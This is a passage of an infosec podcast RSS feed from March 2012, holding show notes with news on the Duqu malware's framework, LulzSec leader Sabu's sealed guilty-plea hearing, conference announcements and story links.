<p dir="ltr" style="text-align: justify;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">F Sharp, Iron Python, CPLEX LIB, High-Level Assembly, LISP, Erlang are just a few of the names of programming languages in which Duqu&rsquo;s framework could be written. It&rsquo;s uncertain yet which one it is, but one thing is clear, the malware&rsquo;s framework looks different from anything else previously analyzed by Kaspersky experts.</span></b></p>
<p><b><br />
	<span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The researchers determined that Duqu&rsquo;s Payload library (DLL) looks like a common Windows PE DLL compiled in Microsoft&rsquo;s Visual Studio 2008. </span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&ldquo;The entry point code is absolutely standard, and there is one function exported by ordinal number 1 that also looks like MSVC++,&rdquo; Kaspersky Lab Expert Igor Soumenkov said. </span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">&ldquo;This function is called from the PNF DLL and it is actually the &#039;main&#039; function that implements all the logics of contacting C&amp;C servers, receiving additional payload modules and executing them.&rdquo;</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">However, the way this logic was programmed and the tools that were utilized are mindboggling. The only certain thing is that it&#039;s an object-oriented programming language.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="https://www.adafruit.com/badges"><span>https://www.adafruit.com/badges</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Welcome to our BETA! Adafruit offers a fun and exciting &quot;badges&quot; of achievement for electronics, science and engineering. We believe everyone should be able to be rewarded for learning a useful skill, a badge is just one of the many ways to show and share. Our physical badges and stickers are for use with educators, classrooms, workshops, Maker Faires, TechShops, Hackerspaces,Makerspaces and around the world to reward beginners on their skill building journey! Our digital skill badges are the start of whatLadyada (Limor Fried) and the Adafruit team think might be &quot;Scouts 2.0&quot;. We&#039;ll have an API more fun stuff later so everyone can join in, easy ways to make this part of a social network profile and more (XML feed for now). We hope you enjoy the first round of students and young persons who we&#039;ve awarded badges to. If you know a young person who has done something amazing and shared their projects let us know! To see the &quot;leaderboard&quot; click here! </span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims"><span>http://www.fbi.gov/newyork/press-releases/2012/six-hackers-in-the-united-states-and-abroad-charged-for-crimes-affecting-over-one-million-victims</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://arstechnica.com/tech-policy/news/2012/03/report-lulzsec-leader-sabu-worked-with-fbi-since-last-summer.ars"><span>http://arstechnica.com/tech-policy/news/2012/03/report-lulzsec-leader-sabu-worked-with-fbi-since-last-summer.ars</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><br />
	<a href="http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/"><span>http://www.foxnews.com/scitech/2012/03/06/hacking-group-lulzsec-swept-up-by-law-enforcement/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><br />
	<a href="http://www.foxnews.com/scitech/2012/03/06/exclusive-inside-lulzsec-mastermind-turns-on-his-minions/"><span>http://www.foxnews.com/scitech/2012/03/06/exclusive-inside-lulzsec-mastermind-turns-on-his-minions/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><br />
	<a href="http://www.foxnews.com/scitech/2012/03/06/exclusive-unmasking-worlds-most-wanted-hacker/"><span>http://www.foxnews.com/scitech/2012/03/06/exclusive-unmasking-worlds-most-wanted-hacker/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://arstechnica.com/tech-policy/news/2012/03/great-personal-danger-inside-hacker-sabus-guilty-plea-hearing.ars"><span>http://arstechnica.com/tech-policy/news/2012/03/great-personal-danger-inside-hacker-sabus-guilty-plea-hearing.ars</span></a></b></p>
<p><b><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">The hacker known as &quot;Sabu&quot; inspired fear in corporations and loyalty from his LulzSec/Anonymous associates, but when he showed up in a Lower Manhattan federal courtroom on August 15, 2011, he was a humbled man.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Hector Monsegur was there to plead guilty to 12 counts of hacking, bank fraud, and identity theft. Only 27 years old, he was facing a possible sentence of 122 years in prison for the charges&mdash;and he was also wanted in California (in two separate judicial districts), Virginia, and Georgia. The case was critical for the government; the US Attorney for the Southern District of New York, Preet Bharara, personally attended the hearing.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Monsegur had been arrested by FBI agents back in June after they had linked Monsegur to the &quot;Sabu&quot; name; agents found him operating out of a modest sixth-floor apartment in public housing. Neighbors had longcomplained about the noise and revelry from his apartment, which often went on all night long.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">By August, Monsegur had agreed in principle to a plea deal with the government. He now feared for his own safety. The government, first his foe, became his protector; after all, his enemies had already correctly identified him in various Internet postings. The guilty plea hearing therefore took place in a sealed courtroom &quot;in light of the danger to defendant,&quot; said Judge Loretta Preska in a transcript of the hearing obtained by Ars Technica.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Monsegur was polite, saying little but &quot;Yes&quot; and &quot;Yes, your honor&quot; as the the judge ensured that he was making a plea voluntarily, and that it was in his best interests to do so. The deal on offer was &quot;a little unusual,&quot; as Assistant US Attorney James Pastore told the court. It was a &quot;global&quot; plea deal that applied not just to the charges brought by Bharara and his staff, but by any charges that might be filed by the other 93 US Attorneys in the country.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Monsegur would agree to help the government make its case against his former associates and he would plead guilty to a string of offenses. The government would ask for leniency, but Monsegur was guaranteed a minimum two year prison sentence, and he agreed to pay restitution. The plea deal did </span><span style="font-size: 13px;font-family: Arial;font-weight: normal;font-style: italic;vertical-align: baseline">not</span><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline"> cover any criminal tax violations; if Monsegur had screwed the IRS, he was on his own.</span><br />
	</b></p>
<h3><b><span style="font-family: Arial;vertical-align: baseline">Confession</span></b></h3>
<p><b><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">The agreement was acceptable to the court, but the judge had one further question. &quot;And do I understand that you are offering to plead guilty because you are in fact guilty?&quot; Monsegur answered a short &quot;yes.&quot; And with that, it was time to confess on the record.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;Tell me what you did, sir,&quot; said Judge Preska, and Monsegur began.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">All of the illegal conduct I am about to admit took place between 2010 and 2011. All of the conduct also involved the use of a computer located in Manhattan. I was not authorized to gain access to any of the computer systems involved in my offense conduct. For the conduct referred to in Counts One to Eight it was my intent to cause damage to these systems. As a result of this conduct, damages of $5,000 occurred in each instance&#8230;</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">I agreed with others to participate in a scheme, and I personally participated in a DoS attack on computer systems, PayPal, MasterCard, and Visa. I also participated in those attacks against computer systems of Tunisia and Algeria. In addition, I attempted to obtain information from the EAGLE server of Zimbabwe. I knew my conduct was illegal&#8230;</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">I agreed with others to participate in the scheme and personally participated in obtaining access to a PBS Web site and defaced it&#8230;I also participated to gaining access to computer systems used by Sony Pictures and stole confidential information&#8230; I also participated in a cyber attack on the systems of Infraguard-Atlanta&#8230; I agreed with others and personally participated in cyber attacks on the systems of HBGary and Fox resulting in a loss of more than $5,000, and I knew my conduct was illegal.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">And so it went, down the list of known and suspected hacks. One surprise emerged.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;I gained unauthorized access to the computer systems of an auto supply company with the intent to defraud the company,&quot; Monsegur admitted, &quot;and fraudulently caused about $3,456 worth of automobile motors to be shipped to myself. I knew the conduct was illegal.&quot;</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">He also admitted to using stolen credit card numbers to &quot;pay my own bills&quot; and to obtaining &quot;names, Social Security numbers, and addresses of [bank] accounts and account holders.&quot;</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">Some of this involved hacking; some did not. After a moment of confusion, the judge asked Monsegur to clarify how he had obtained bank account information and Social Security numbers.</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">&quot;I downloaded the PDFs of TurboTax returns that were publicly accessible over Google, and that&#039;s it,&quot; he responded. &quot;And due to the downloading of the PDFs, I had access to the bank account information, Social Security numbers, names, and all of that.&quot;</span><br />
	</b></p>
<h3><b><span style="font-family: Arial;vertical-align: baseline">&quot;Great personal danger&quot;</span></b></h3>
<p><b><span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">With that, the hearing came to a close, but it would leave no record in the court&#039;s official docket. Not only were all documents around the case sealed, but the case itself was subject to &quot;delayed docketing.&quot; As the judge noted in her final remarks, &quot;the facts here are sufficiently unique that it is possible that the defendant could be identified and, thus, be in great personal danger.&quot;</span><br />
	<span style="font-size: 13px;font-family: Arial;font-weight: normal;vertical-align: baseline">As Monsegur left the courthouse and stepped out into Pearl Street&#039;s August heat, he had a new secret&mdash;one that he would have to keep for the next seven months until his betrayal splashed onto the front pages of newspapers around the world.</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-616-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3622/0/infosec-daily-podcast-episode-616.mp3" length="16424227" type="audio/mpeg" />
		<itunes:duration>0:34:13</itunes:duration>
		<itunes:subtitle>Episode 616 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 616 for March 10, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Themson Mester.
Guests: aricon, connection and spridel and and oncee
&#160;
Announcemen[...]</itunes:subtitle>
		<itunes:summary>Episode 616 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 616 for March 10, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Themson Mester.
Guests: aricon, connection and spridel and and oncee
&#160;
Announcements:
How to Rob a Bank in 30 Days or less
	When: March 14th 2012
	Where: http://securityzone.co/webinar-en.html
	Sign up for the webinar that will probably get b0n3z on that watchlist
Social Engineering Training
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories

	Source: http://www.infosecisland.com/blogview/20648-The-Jesters-QR-Code-Pwns-Targets-with-WebKit-Exploit.html
Anti-jihadi hacker and Anonymous/AntiSec/LulzSec nemesis The Jester (th3j35t3r) claims to have pulled a fast one on some undesirables, taking advantage of the target&#039;s curious nature and a known smartphone exploit.
&#34;It was a highly targeted and precise attack, against known bad guys, randoms were left totally unscathed,&#34; The Jester blogged.
The operation was intended to snare unsuspecting targets The Jester had previously identified and aggregated in a database, while supposedly leaving non-targets unscathed.
&#34;At the beginning of this week just hours before the news of Hector Monsegur&#8217;s arrest broke, many of you will have noticed that my twitter profile pic changed from the usual &#8216;Jester Mask&#8217; to a QR-Code. The timing of this subtle change could not have been more favorable,&#34; Jester wrote.
	&#8230;
	Source: http://www.techdirt.com/blog/wireless/articles/20120308/03410718033/court-confirms-that-police-dont-need-warrant-to-do-limited-search-mobile-phone.shtml
In a court ruling that came out a little while ago (just catching up now), Judge Richard Posner took the lead in an appeals court ruling that effectively reaffirmed the idea that police don&#039;t need a warrant to search mobile phones as they&#039;re arresting someone. Of course, this general concept is not new and I&#039;ve discussed my concerns about police being able to search phones without a warrant in the past &#8212; but this particular ruling does seem pretty limited. While Posner notes some of the bigger questions, he basically compares the phone to a diary, and focuses on the mere [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 615 &#8211; Chrome 0days, Lost Phone Project, Symantec Release, and Fed Recruits</title>
		<link>http://www.isdpodcast.com/episode-615-chrome-0days-lost-phone-project-symantec-release-and-fed-recruits</link>
		<comments>http://www.isdpodcast.com/episode-615-chrome-0days-lost-phone-project-symantec-release-and-fed-recruits#comments</comments>
		<pubDate>Sat, 10 Mar 2012 01:58:33 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3610</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 615 for March 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma. &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 615 for March 9, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.theregister.co.uk/2012/03/09/pwn2own_pwnium_cansecwest/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/03/09/pwn2own_pwnium_cansecwest/</span></a></p>
